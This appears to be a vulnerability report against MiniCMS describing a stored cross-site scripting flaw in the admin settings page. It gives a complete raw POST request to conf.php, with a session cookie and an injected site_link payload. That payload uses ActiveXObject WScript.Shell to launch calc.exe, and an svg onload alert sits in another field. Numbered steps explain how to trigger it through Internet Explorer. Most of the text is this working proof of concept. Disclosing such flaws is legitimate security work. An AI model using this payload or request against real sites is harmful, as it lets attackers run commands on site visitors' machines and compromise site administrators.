There is a XSS vulnerability can attack users to execute commands

[harry1080]

There is a storage XSS vulnerability at the location of the web site at the page setup site, which can be executed by constructing POC.
poc:

POST /MiniCMS-master/MiniCMS-master/mc-admin/conf.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/MiniCMS-master/MiniCMS-master/mc-admin/conf.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 449
Cookie: mc_token=c30807e6587ade285ba7ade9f881b3d7; lang=3f81c1cb88c4e6355b4f5f02b32b4bdf8a9479da%7Een
Connection: close
Upgrade-Insecure-Requests: 1

site_name=%E6%88%91%E7%9A%84%E7%BD%91%E7%AB%99&site_desc=%E5%8F%88%E4%B8%80%E4%B8%AAMiniCMS%E7%BD%91%E7%AB%99&site_link=http%3A%2F%2F127.0.0.1%2FMiniCMS-master%2FMiniCMSmaste[payload]&user_nick=%E7%A5%9E%E7%A7%98%E4%BA%BA&user_name=admin&user_pass=&comment_code=%26lt%3Bsvg%2Fonload%3Dalert%28%27xss%27%29%26gt%3B&save=%E4%BF%9D%E5%AD%98%E8%AE%BE%E7%BD%AE

payload = "><script>var%20objShell;objShell=new%20ActiveXObject("WScript.Shell").run("calc.exe");</script><"

Example：
1.Login to the background, locate the site, and find the website address.

2.Constructing exp at the site_link parameter

3.Access through IE, run active

4.Pop-up the CMD command